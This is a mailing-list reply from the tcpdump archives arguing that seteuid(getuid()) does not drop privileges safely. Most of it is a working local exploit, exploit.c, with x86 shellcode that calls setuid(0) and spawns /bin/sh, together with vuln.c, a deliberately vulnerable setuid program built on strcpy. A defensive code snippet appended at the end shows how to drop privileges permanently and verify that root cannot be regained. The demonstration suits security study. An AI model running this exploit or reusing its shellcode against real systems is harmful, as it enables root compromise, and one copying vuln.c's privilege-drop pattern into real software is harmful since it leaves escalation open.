tcpdump mailing list archives
Re: OpenBSD work on Tcpdump privilege separation - OFFTOPIC
From: Rodrigo Rubira Branco <rodrigo () firewalls com br>
Date: Wed, 25 Feb 2004 17:00:25 -0300
Pekka,

I attached to this mail one vuln.c program and one exploit.c to demonstrate the shellcode calling setuid(0) and gaining root privileges...

This technique is a single demonstration of what I mentioned later.

Thank you,
Rodrigo.

Pekka Savola wrote:
On Wed, 25 Feb 2004, Rodrigo Rubira Branco wrote:
> Simply calling setuid(getuid()) isn't sufficient, because if an attacker discovers a buffer overflow, it is possible for him to insert a call to setuid in his shellcode and gain root privileges.

Hmm.. I'm not sure if I understand what you're referring to? Could you elaborate + provide a patch or description of the "proper" means?

It is assumed that the attacker would only be able to insert shellcode or exploit the system after the privileges have been dropped -- not before that.

Note that setuid(getuid()) is only done if the binary is setuid root. For a regular binary, you'll setuid to the specific account.
--
Rodrigo Rubira Branco
Security & Infrastructure
Firewalls Security Corporation
rodrigo () firewalls com br
Tel: 55(14) 3234-5665  Cel: 55(14) 9795-1850
Site: http://www.firewalls.com.br
Attachment exploit.c:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* strlen */
#include <unistd.h>      /* execl */

#define ALIGN 0
#define OFFSET 0
#define RET_POSITION 1024
#define RANGE 20
#define NOP 0x90

/* Linux/x86 shellcode: setuid(0) via int 0x80 (eax = 23, ebx = 0), then
 * execve("/bin/sh"). The setuid(0) prefix is the point of the demonstration:
 * it gets root back whenever the saved set-user-ID is still 0. */
char shellcode[] =
    "\x31\xc0"                  /* xor  %eax,%eax           */
    "\x31\xdb"                  /* xor  %ebx,%ebx           */
    "\xb0\x17"                  /* mov  $0x17,%al  (setuid) */
    "\xcd\x80"                  /* int  $0x80               */
    "\xeb\x1f" "\x5e" "\x89\x76\x08" "\x31\xc0" "\x88\x46\x07"
    "\x89\x46\x0c" "\xb0\x0b" "\x89\xf3" "\x8d\x4e\x08" "\x8d\x56\x0c"
    "\xcd\x80" "\x31\xdb" "\x89\xd8" "\x40" "\xcd\x80"
    "\xe8\xdc\xff\xff\xff" "/bin/sh";

/* Current stack pointer (32-bit x86 only). */
unsigned long get_sp(void)
{
    unsigned long sp;
    __asm__("movl %%esp,%0" : "=r"(sp));
    return sp;
}

int main(int argc, char **argv)
{
    char buff[RET_POSITION + RANGE + ALIGN + 1], *ptr;
    long addr;
    unsigned long sp;
    int offset = OFFSET, bsize = RET_POSITION + RANGE + ALIGN + 1;
    int i;

    if (argc > 1)
        offset = atoi(argv[1]);
    sp = get_sp();
    addr = sp - offset;

    /* Fill the buffer with the guessed return address (little-endian),
     * staying inside buff. */
    for (i = 0; i + ALIGN + 3 < bsize; i += 4) {
        buff[i + ALIGN]     = (addr & 0x000000ff);
        buff[i + ALIGN + 1] = (addr & 0x0000ff00) >> 8;
        buff[i + ALIGN + 2] = (addr & 0x00ff0000) >> 16;
        buff[i + ALIGN + 3] = (addr & 0xff000000) >> 24;
    }
    /* NOP sled, then the shellcode, then the terminating NUL. */
    for (i = 0; i < bsize - RANGE * 2 - strlen(shellcode) - 1; i++)
        buff[i] = NOP;
    ptr = buff + bsize - RANGE * 2 - strlen(shellcode) - 1;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[bsize - 1] = '\0';

    printf("Jump to 0x%08lx\n", addr);
    execl("./vuln", "vuln", buff, (char *)NULL);
    return 1;   /* only reached if execl fails */
}
```
Attachment vuln.c:

```c
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    char buffer[1024];

    /* Only the effective UID is changed; in a setuid-root binary the saved
     * set-user-ID stays 0, so a later setuid(0) still succeeds. */
    seteuid(getuid());

    /* Deliberately unbounded copy: the overflow under discussion. */
    if (argc > 1)
        strcpy(buffer, argv[1]);
    return 0;
}
```
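A defender-side counterpart, added here and not part of the thread or its attachments: it drops privileges so that the saved set-user-ID is rewritten as well, then verifies in a forked child that setuid(0) no longer succeeds. The function names are chosen for this example; it assumes a Linux or BSD system where setreuid() with the real ID set also rewrites the saved ID (POSIX behaviour).

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanent drop. vuln.c's seteuid(getuid()) moves only the effective UID
 * and leaves the saved set-user-ID at 0, which is what lets the setuid(0)
 * in the posted shellcode succeed. setreuid(uid, uid), because it sets the
 * real ID, also rewrites the saved ID (POSIX), so nothing is left to regain.
 * Groups go first: once the UID is unprivileged, changing GIDs fails. */
int drop_permanently(uid_t uid, gid_t gid)
{
    if (setregid(gid, gid) != 0)
        return -1;
    return setreuid(uid, uid);
}

/* Probe in a forked child whether setuid(0) would still succeed, i.e.
 * whether a saved UID of 0 survived the drop. The child exits 1 if it
 * regained root and 0 otherwise; the parent's identity never changes.
 * Returns -1 if the probe could not run. */
int root_can_be_regained(void)
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(setuid(0) == 0 ? 1 : 0);
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Post-drop check: 1 only if real and effective UID equal uid AND root can
 * no longer be regained. Call it right after drop_permanently() and abort
 * the program if it returns 0. */
int drop_verified(uid_t uid)
{
    return getuid() == uid && geteuid() == uid && root_can_be_regained() == 0;
}

int main(void)
{
    /* Drop to the invoking user, then prove the drop cannot be undone. */
    if (drop_permanently(getuid(), getgid()) != 0)
        return 1;
    printf("privileges dropped and verified: %d\n", drop_verified(getuid()));
    return 0;
}
```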